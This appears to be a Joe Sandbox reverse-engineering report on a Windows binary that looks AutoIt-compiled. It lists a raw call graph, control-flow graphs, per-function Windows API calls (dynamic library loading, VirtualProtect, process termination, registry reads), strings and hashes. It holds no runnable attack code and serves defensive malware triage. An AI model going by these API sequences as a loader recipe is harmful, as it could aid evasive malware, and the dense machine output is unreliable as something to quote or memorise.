82592->82782 82594 40906e 82594->82592 82596 42cea9 82594->82596 82598 4090a4 82594->82598 82595 42cebf 82781 45e62e 118 API calls 3 library calls 82596->82781 82773 404160 82598->82773 82601 4090f0 ctype 82601->82500 82602 4090be ctype 82602->82601 82603 4092c0 VariantClear 82602->82603 82603->82602 82606 4292e3 82604->82606 82608 40d30c 82604->82608 82605 429323 82605->82500 82606->82605 82607 4292fd TranslateAcceleratorW 82606->82607 82607->82608 82608->82500 82610 4296d0 82609->82610 82613 40d32f 82609->82613 82610->82500 82611 40d33c 82611->82500 82612 42972a IsDialogMessageW 82612->82611 82612->82613 82613->82611 82613->82612 82920 4340ec GetClassLongW 82613->82920 82616 409a66 _wcslen 82615->82616 82617 41171a 77 API calls 82616->82617 82677 40aade _memcpy_s ctype 82616->82677 82618 409a9c _memcpy_s 82617->82618 82620 41171a 77 API calls 82618->82620 82621 409abd 82620->82621 82623 409aeb CharUpperBuffW 82621->82623 82627 409b09 ctype 82621->82627 82621->82677 82622 42cee9 82624 41171a 77 API calls 82622->82624 82623->82627 82632 42cf10 _memcpy_s 82624->82632 82662 409b88 ctype 82627->82662 82923 47d10e 152 API calls 82627->82923 82628 4092c0 VariantClear 82629 42e5e0 82628->82629 82953 410ae0 VariantClear ctype 82629->82953 82631 42e5f2 82952 45e62e 118 API calls 3 library calls 82632->82952 82633 409e4a 82633->82632 82636 41171a 77 API calls 82633->82636 82640 409ea4 82633->82640 82634 40aa5b 82637 41171a 77 API calls 82634->82637 82635 41171a 77 API calls 82635->82662 82636->82640 82653 40aa81 _memcpy_s ctype 82637->82653 82638 40c3e0 77 API calls 82638->82662 82639 409ed0 82643 42d50d 82639->82643 82698 409ef8 _memcpy_s ctype 82639->82698 82931 40b800 VariantClear VariantClear ctype 82639->82931 82640->82639 82641 41171a 77 API calls 82640->82641 82642 42d480 82641->82642 82646 42d491 82642->82646 82928 44b3f6 77 API calls 82642->82928 82648 42d527 82643->82648 82932 40b800 VariantClear VariantClear ctype 82643->82932 82644 40a3a7 82651 40a415 82644->82651 82699 42db5c 82644->82699 82645 42d195 VariantClear 82645->82662 82656 40df50 77 API calls 82646->82656 82648->82698 82933 40e2e0 VariantClear ctype 82648->82933 82655 41171a 77 API calls 82651->82655 82652 4092c0 VariantClear 82652->82662 82661 41171a 77 API calls 82653->82661 82672 40a41c 82655->82672 82663 42d4a6 82656->82663 82659 42db96 82939 45e62e 118 API calls 3 library calls 82659->82939 82661->82677 82662->82632 82662->82633 82662->82634 82662->82635 82662->82638 82662->82645 82662->82652 82662->82653 82666 42d128 82662->82666 82669 42d20c 82662->82669 82675 42dbb9 82662->82675 82924 40c620 120 API calls 82662->82924 82926 40be00 77 API calls 2 library calls 82662->82926 82927 40e380 VariantClear ctype 82662->82927 82929 4530b3 77 API calls 82663->82929 82668 4092c0 VariantClear 82666->82668 82667 42d4d7 82930 4530b3 77 API calls 82667->82930 82674 42d131 82668->82674 82669->82500 82683 40a481 82672->82683 82940 40c8a0 VariantClear ctype 82672->82940 82925 410ae0 VariantClear ctype 82674->82925 82675->82628 82922 401380 77 API calls 82677->82922 82679 402cc0 77 API calls 82679->82698 82681 4092c0 VariantClear 82712 40a534 _memcpy_s ctype 82681->82712 82682 411421 76 API calls __cinit 82682->82698 82684 40a4ed 82683->82684 82685 42dc1e VariantClear 82683->82685 82683->82712 82689 40a4ff ctype 82684->82689 82941 40e380 VariantClear ctype 82684->82941 82685->82689 82688 41171a 77 API calls 82688->82712 82689->82688 82689->82712 82693 44b3f6 77 API calls 82693->82698 82694 42deb6 VariantClear 82694->82712 82695 40a73c 82700 42e237 82695->82700 82706 40a76b 82695->82706 82696 41171a 77 API calls 82696->82698 82697 40e380 VariantClear 82697->82712 82698->82644 82698->82659 82698->82677 82698->82679 82698->82682 82698->82693 82698->82696 82698->82699 82705 40a053 82698->82705 82934 45ee98 77 API calls 82698->82934 82935 4019e0 78 API calls 82698->82935 82936 404260 78 API calls 82698->82936 82937 409210 VariantClear 82698->82937 82938 4721e5 VariantClear 82699->82938 82945 46e709 VariantClear VariantClear ctype 82700->82945 82701 42dfe9 VariantClear 82701->82712 82702 42df47 VariantClear 82702->82712 82704 40a7a2 82715 40a7ad ctype 82704->82715 82946 40b800 VariantClear VariantClear ctype 82704->82946 82705->82500 82706->82704 82728 40a800 ctype 82706->82728 82921 40b800 VariantClear VariantClear ctype 82706->82921 82709 40a8b0 82722 40a8c2 ctype 82709->82722 82948 40e380 VariantClear ctype 82709->82948 82710 42e312 82713 42e337 VariantClear 82710->82713 82710->82722 82711 41171a 77 API calls 82714 42dd10 VariantInit VariantCopy 82711->82714 82712->82681 82712->82694 82712->82695 82712->82697 82712->82700 82712->82701 82712->82702 82712->82711 82719 41171a 77 API calls 82712->82719 82942 46e9cd 77 API calls 82712->82942 82943 409210 VariantClear 82712->82943 82944 44cc6c VariantClear ctype 82712->82944 82713->82722 82714->82712 82718 42dd30 VariantClear 82714->82718 82716 40a7ee 82715->82716 82724 42e2a7 VariantClear 82715->82724 82715->82728 82716->82728 82947 40e380 VariantClear ctype 82716->82947 82717 42e3b2 82725 42e3da VariantClear 82717->82725 82732 40a91a ctype 82717->82732 82718->82712 82719->82712 82722->82717 82723 40a908 82722->82723 82723->82732 82949 40e380 VariantClear ctype 82723->82949 82724->82728 82725->82732 82727 42e47f 82731 42e4a3 VariantClear 82727->82731 82737 40a957 ctype 82727->82737 82728->82709 82728->82710 82729 40a945 82729->82737 82950 40e380 VariantClear ctype 82729->82950 82731->82737 82732->82727 82732->82729 82734 40aa22 ctype 82734->82500 82735 42e559 VariantClear 82735->82737 82737->82734 82737->82735 82951 40e380 VariantClear ctype 82737->82951 82738->82494 82739->82512 82740->82512 82741->82512 82742->82512 82743->82512 82744->82512 82746 40412e 82745->82746 82747 4092c0 VariantClear 82746->82747 82748 404138 82747->82748 82748->82521 82749->82512 82750->82512 82751->82500 82752->82493 82753->82500 82754->82500 82755->82536 82756->82540 82757->82549 82758->82556 82759->82543 82760->82582 82761->82587 82762->82566 82763->82589 82764->82566 82765->82589 82766->82566 82767->82571 82768->82589 82769->82575 82770->82589 82771->82569 82772->82594 82774 4092c0 VariantClear 82773->82774 82775 40416e 82774->82775 82776 404120 VariantClear 82775->82776 82777 40419b 82776->82777 82783 40efe0 82777->82783 82791 4734b7 82777->82791 82778 4041c6 82778->82592 82778->82602 82781->82592 82782->82595 82784 40eff5 CreateFileW 82783->82784 82785 4299bf 82783->82785 82786 40f017 82784->82786 82785->82786 82787 4299c4 CreateFileW 82785->82787 82786->82778 82787->82786 82788 4299ea 82787->82788 82835 40e0d0 SetFilePointerEx SetFilePointerEx 82788->82835 82790 4299f5 82790->82786 82792 453063 113 API calls 82791->82792 82793 4734d7 82792->82793 82794 473545 82793->82794 82795 47350c 82793->82795 82836 463c42 82794->82836 82797 4092c0 VariantClear 82795->82797 82803 473514 82797->82803 82798 473558 82799 47355c 82798->82799 82815 473595 82798->82815 82800 4092c0 VariantClear 82799->82800 82810 473564 82800->82810 82801 473616 82849 463d7e 82801->82849 82803->82778 82804 473622 82806 473697 82804->82806 82807 47362c 82804->82807 82805 453063 113 API calls 82805->82815 82883 457838 82806->82883 82811 4092c0 VariantClear 82807->82811 82810->82778 82813 473634 82811->82813 82813->82778 82814 473655 82818 4092c0 VariantClear 82814->82818 82815->82801 82815->82805 82815->82814 82895 462f5a 89 API calls __wcsicoll 82815->82895 82826 47365d 82818->82826 82819 4736b0 82896 45e62e 118 API calls 3 library calls 82819->82896 82820 4736c9 82897 40e7e0 78 API calls 82820->82897 82823 4736db 82825 4736ff 82823->82825 82898 40d030 78 API calls 82823->82898 82824 4736ba GetCurrentProcess TerminateProcess 82824->82820 82834 473731 82825->82834 82900 40d030 78 API calls 82825->82900 82901 46b945 136 API calls 2 library calls 82825->82901 82826->82778 82828 4736f1 82899 46b945 136 API calls 2 library calls 82828->82899 82831 473744 FreeLibrary 82832 47374b 82831->82832 82832->82778 82834->82831 82834->82832 82835->82790 82902 45335b 78 API calls 82836->82902 82838 463c5d 82903 442c52 82 API calls _wcslen 82838->82903 82840 463c72 82842 40c060 77 API calls 82840->82842 82848 463cac 82840->82848 82843 463c8e 82842->82843 82904 4608ce 77 API calls _memcpy_s 82843->82904 82845 463ca4 82846 40c740 77 API calls 82845->82846 82846->82848 82847 463cf7 82847->82798 82848->82847 82905 462f5a 89 API calls __wcsicoll 82848->82905 82850 453063 113 API calls 82849->82850 82851 463d99 82850->82851 82852 463de0 82851->82852 82853 463dca 82851->82853 82907 40c760 80 API calls 82852->82907 82906 453081 113 API calls 82853->82906 82856 463dd0 LoadLibraryW 82866 463e09 82856->82866 82857 463de7 82864 463e19 82857->82864 82908 40c760 80 API calls 82857->82908 82859 463dfb 82859->82864 82909 40c760 80 API calls 82859->82909 82860 463e3e 82861 463e4e 82860->82861 82862 463e7b 82860->82862 82910 40d500 82861->82910 82916 40c760 80 API calls 82862->82916 82864->82804 82866->82860 82866->82864 82869 463e82 GetProcAddress 82872 463e90 82869->82872 82871 463e62 GetProcAddress 82874 463e79 82871->82874 82872->82864 82873 463edf 82872->82873 82872->82874 82873->82864 82877 463eef FreeLibrary 82873->82877 82874->82872 82917 403470 77 API calls _memcpy_s 82874->82917 82876 463eb4 82878 40d500 77 API calls 82876->82878 82877->82864 82879 463ebd 82878->82879 82918 45efe7 79 API calls ctype 82879->82918 82881 463ec8 GetProcAddress 82919 401330 ctype 82881->82919 82884 457a4c 82883->82884 82888 45785f _strcat _wcslen _wcscpy ctype 82883->82888 82891 410d40 82884->82891 82885 443576 80 API calls 82885->82888 82886 40c760 80 API calls 82886->82888 82887 453081 113 API calls 82887->82888 82888->82884 82888->82885 82888->82886 82888->82887 82889 4138ba 69 API calls _malloc 82888->82889 82890 40f580 79 API calls 82888->82890 82889->82888 82890->82888 82893 410d55 82891->82893 82892 410ded VirtualProtect 82894 410dbb 82892->82894 82893->82892 82893->82894 82894->82819 82894->82820 82895->82815 82896->82824 82897->82823 82898->82828 82899->82825 82900->82825 82901->82825 82902->82838 82903->82840 82904->82845 82905->82847 82906->82856 82907->82857 82908->82859 82909->82866 82911 41171a 77 API calls 82910->82911 82912 40d515 82911->82912 82913 41171a 77 API calls 82912->82913 82914 40d521 82913->82914 82915 45efe7 79 API calls ctype 82914->82915 82915->82871 82916->82869 82917->82876 82918->82881 82919->82873 82920->82613 82921->82704 82922->82622 82923->82627 82924->82662 82925->82734 82926->82662 82927->82662 82928->82646 82929->82667 82930->82639 82931->82643 82932->82648 82933->82698 82934->82698 82935->82698 82936->82698 82937->82698 82938->82659 82939->82675 82940->82672 82941->82689 82942->82712 82943->82712 82944->82712 82945->82704 82946->82715 82947->82728 82948->82722 82949->82732 82950->82737 82951->82737 82952->82675 82953->82631 82954 42919b 82959 40ef10 82954->82959 82957 411421 __cinit 76 API calls 82958 4291aa 82957->82958 82960 41171a 77 API calls 82959->82960 82961 40ef17 82960->82961 82962 42ad48 82961->82962 82967 40ef40 76 API calls __cinit 82961->82967 82964 40ef2a 82968 40e470 82964->82968 82967->82964 82969 40c060 77 API calls 82968->82969 82970 40e483 GetVersionExW 82969->82970 82971 4021e0 77 API calls 82970->82971 82972 40e4bb 82971->82972 82994 40e600 82972->82994 82976 42accc 82980 42ad28 GetSystemInfo 82976->82980 82984 42ad38 GetSystemInfo 82980->82984 82981 40e557 GetCurrentProcess 83014 40ee30 LoadLibraryA GetProcAddress 82981->83014 82982 40e56c 82982->82984 83007 40eee0 82982->83007 82987 40e5c9 83011 40eea0 82987->83011 82990 40e5e0 82992 40e5f1 FreeLibrary 82990->82992 82993 40e5f4 82990->82993 82991 40e5dd FreeLibrary 82991->82990 82992->82993 82993->82957 82995 40e60b 82994->82995 82996 40c740 77 API calls 82995->82996 82997 40e4c2 82996->82997 82998 40e620 82997->82998 82999 40e62a 82998->82999 83000 42ac93 82999->83000 83001 40c740 77 API calls 82999->83001 83002 40e4ce 83001->83002 83002->82976 83003 40ee70 83002->83003 83004 40e551 83003->83004 83005 40ee76 LoadLibraryA 83003->83005 83004->82981 83004->82982 83005->83004 83006 40ee87 GetProcAddress 83005->83006 83006->83004 83008 40e5bf 83007->83008 83009 40eee6 LoadLibraryA 83007->83009 83008->82980 83008->82987 83009->83008 83010 40eef7 GetProcAddress 83009->83010 83010->83008 83015 40eec0 LoadLibraryA GetProcAddress 83011->83015 83013 40e5d3 GetNativeSystemInfo 83013->82990 83013->82991 83014->82982 83015->83013 83016 42e89e 83023 40c000 83016->83023 83018 42e8ac 83019 409a40 167 API calls 83018->83019 83020 42e8ca 83019->83020 83034 44b92e VariantClear 83020->83034 83022 42f3ae 83024 40c014 83023->83024 83025 40c007 83023->83025 83027 40c01a 83024->83027 83028 40c02c 83024->83028 83035 409210 VariantClear 83025->83035 83036 409210 VariantClear 83027->83036 83031 41171a 77 API calls 83028->83031 83029 40c00f 83029->83018 83033 40c033 83031->83033 83032 40c023 83032->83018 83033->83018 83034->83022 83035->83029 83036->83032 83037 4803f4 83038 48046c 83037->83038 83039 4804a7 83037->83039 83041 480499 83038->83041 83042 480473 83038->83042 83040 40c060 77 API calls 83039->83040 83064 4804b0 83040->83064 83070 47fea8 120 API calls 83041->83070 83044 480478 83042->83044 83045 48048b 83042->83045 83044->83039 83046 48047d 83044->83046 83069 47f6ef 120 API calls __itow_s 83045->83069 83068 47e8db 120 API calls 83046->83068 83048 40df50 77 API calls 83048->83064 83051 4092c0 VariantClear 83052 480b51 83051->83052 83054 4092c0 VariantClear 83052->83054 83053 480486 83053->83051 83055 480b5a 83054->83055 83058 40c3e0 77 API calls 83058->83064 83059 40e6d0 78 API calls 83059->83064 83060 409210 VariantClear 83060->83064 83061 480564 83077 45e62e 118 API calls 3 library calls 83061->83077 83062 40c760 80 API calls 83062->83064 83064->83048 83064->83053 83064->83058 83064->83059 83064->83060 83064->83061 83064->83062 83071 4019e0 78 API calls 83064->83071 83072 4533dc 77 API calls 83064->83072 83073 45e85e 78 API calls 83064->83073 83074 40e7e0 78 API calls 83064->83074 83075 476958 78 API calls 83064->83075 83076 47f529 119 API calls 83064->83076 83068->83053 83069->83053 83070->83053 83071->83064 83072->83064 83073->83064 83074->83064 83075->83064 83076->83064 83077->83053 83078 4291df 83083 40ddd0 83078->83083 83081 411421 __cinit 76 API calls 83082 4291ee 83081->83082 83084 40c060 77 API calls 83083->83084 83085 40de43 83084->83085 83090 40f0d0 83085->83090 83087 40dee0 83088 40df04 83087->83088 83093 40dd50 83087->83093 83088->83081 83099 40f110 RegOpenKeyExW 83090->83099 83094 40dd81 83093->83094 83095 40dd58 _memcpy_s ctype 83093->83095 83098 41171a 77 API calls 83094->83098 83096 41171a 77 API calls 83095->83096 83097 40dd5f 83096->83097 83097->83087 83098->83095 83100 40f13c RegQueryValueExW RegCloseKey 83099->83100 83101 40f0ee 83099->83101 83100->83101 83101->83087
                        APIs
                        • _wcslen.LIBCMT ref: 00409A61
                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                          • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                          • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                          • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                        • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                        • String ID: 0vH$4RH
                        • API String ID: 1143807570-2085553193
                        • Opcode ID: e6b9e3ff342b8d308a29955ceb38cd5f00ea12c77176e3f61e5951be014af1fb
                        • Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
                        • Opcode Fuzzy Hash: e6b9e3ff342b8d308a29955ceb38cd5f00ea12c77176e3f61e5951be014af1fb
                        • Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1203 40e470-40e500 call 40c060 GetVersionExW call 4021e0 call 40e600 call 40e620 1212 40e506-40e509 1203->1212 1213 42accc-42acd1 1203->1213 1216 40e540-40e555 call 40ee70 1212->1216 1217 40e50b-40e51c 1212->1217 1214 42acd3-42acdb 1213->1214 1215 42acdd-42ace0 1213->1215 1219 42ad12-42ad20 1214->1219 1220 42ace2-42aceb 1215->1220 1221 42aced-42acf0 1215->1221 1232 40e557-40e573 GetCurrentProcess call 40ee30 1216->1232 1233 40e579-40e5a8 1216->1233 1222 40e522-40e525 1217->1222 1223 42ac9b-42aca7 1217->1223 1231 42ad28-42ad2d GetSystemInfo 1219->1231 1220->1219 1221->1219 1227 42acf2-42ad06 1221->1227 1222->1216 1228 40e527-40e537 1222->1228 1225 42acb2-42acba 1223->1225 1226 42aca9-42acad 1223->1226 1225->1216 1226->1216 1234 42ad08-42ad0c 1227->1234 1235 42ad0e 1227->1235 1229 42acbf-42acc7 1228->1229 1230 40e53d 1228->1230 1229->1216 1230->1216 1237 42ad38-42ad3d GetSystemInfo 1231->1237 1232->1233 1244 40e575 1232->1244 1233->1237 1238 40e5ae-40e5c3 call 40eee0 1233->1238 1234->1219 1235->1219 1238->1231 1243 40e5c9-40e5db call 40eea0 GetNativeSystemInfo 1238->1243 1247 40e5e0-40e5ef 1243->1247 1248 40e5dd-40e5de FreeLibrary 1243->1248 1244->1233 1249 40e5f1-40e5f2 FreeLibrary 1247->1249 1250 40e5f4-40e5ff 1247->1250 1248->1247 1249->1250
                        APIs
                        • GetVersionExW.KERNEL32 ref: 0040E495
                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                        • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                        • GetNativeSystemInfo.KERNEL32(?,?), ref: 0040E5D3
                        • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                        • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                        • String ID: pMH
                        • API String ID: 2923339712-2522892712
                        • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                        • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                        • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                        • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1577 40eb70-40eb74 1578 40eb96 1577->1578 1579 40eb76-40eb85 LoadLibraryA 1577->1579 1579->1578 1580 40eb87-40eb93 GetProcAddress 1579->1580 1580->1578
                        APIs
                        • LoadLibraryA.KERNEL32(uxtheme.dll), ref: 0040EB7B
                        • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: IsThemeActive$uxtheme.dll
                        • API String ID: 2574300362-3542929980
                        • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                        • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                        • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                        • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28

                        Control-flow Graph

                        APIs
                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                        • __wsplitpath.LIBCMT ref: 00410C61
                          • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                        • _wcsncat.LIBCMT ref: 00410C78
                        • __wmakepath.LIBCMT ref: 00410C94
                          • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                          • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                          • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                          • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                        • _wcscpy.LIBCMT ref: 00410CCC
                        • RegOpenKeyExW.KERNEL32 ref: 00410CE9
                        • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                        • _wcscat.LIBCMT ref: 00429C43
                        • _wcslen.LIBCMT ref: 00429C55
                        • _wcslen.LIBCMT ref: 00429C66
                        • _wcscat.LIBCMT ref: 00429C80
                        • _wcsncpy.LIBCMT ref: 00429CC0
                        • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                        • String ID: Include$Software\AutoIt v3\AutoIt$\
                        • API String ID: 1004883554-2276155026
                        • Opcode ID: f84f773e5c1f596ad2c6b40a9b7963d16100886af7a674061cbd7d72c3873958
                        • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                        • Opcode Fuzzy Hash: f84f773e5c1f596ad2c6b40a9b7963d16100886af7a674061cbd7d72c3873958
                        • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A
                        APIs
                          • Part of subcall function 00409A40: _wcslen.LIBCMT ref: 00409A61
                          • Part of subcall function 00409A40: CharUpperBuffW.USER32(?,?), ref: 00409AF5
                        • Sleep.KERNEL32(0000000A), ref: 00409870
                        • timeGetTime.WINMM ref: 00409880
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: BuffCharSleepTimeUpper_wcslentime
                        • String ID:
                        • API String ID: 3219444185-0
                        • Opcode ID: b124ae733e2c30a8df030179fd7ebda2966fc041c6879d6beed06594e2dda547
                        • Instruction ID: 79dfb759edd1749a95aa3438e3198289cebfc990e9c1b7da565b255c5aac8c6d
                        • Opcode Fuzzy Hash: b124ae733e2c30a8df030179fd7ebda2966fc041c6879d6beed06594e2dda547
                        • Instruction Fuzzy Hash: D422F171608342ABC724DF64C984BABB7A0BF89304F14492FE54997392D77CEC45CB9A

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __fread_nolock$_fseek_wcscpy
                        • String ID: FILE
                        • API String ID: 3888824918-3121273764
                        • Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                        • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                        • Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                        • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA

                        Control-flow Graph

                        APIs
                        • GetSysColorBrush.USER32 ref: 004101F9
                        • LoadCursorW.USER32 ref: 00410209
                        • LoadIconW.USER32 ref: 0041021F
                        • LoadIconW.USER32 ref: 00410232
                        • LoadIconW.USER32 ref: 00410245
                        • LoadImageW.USER32 ref: 0041026A
                        • RegisterClassExW.USER32 ref: 004102C6
                          • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                          • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                          • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                          • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                          • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                          • Part of subcall function 004102F0: LoadIconW.USER32 ref: 004103B1
                          • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(0093D8D8,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
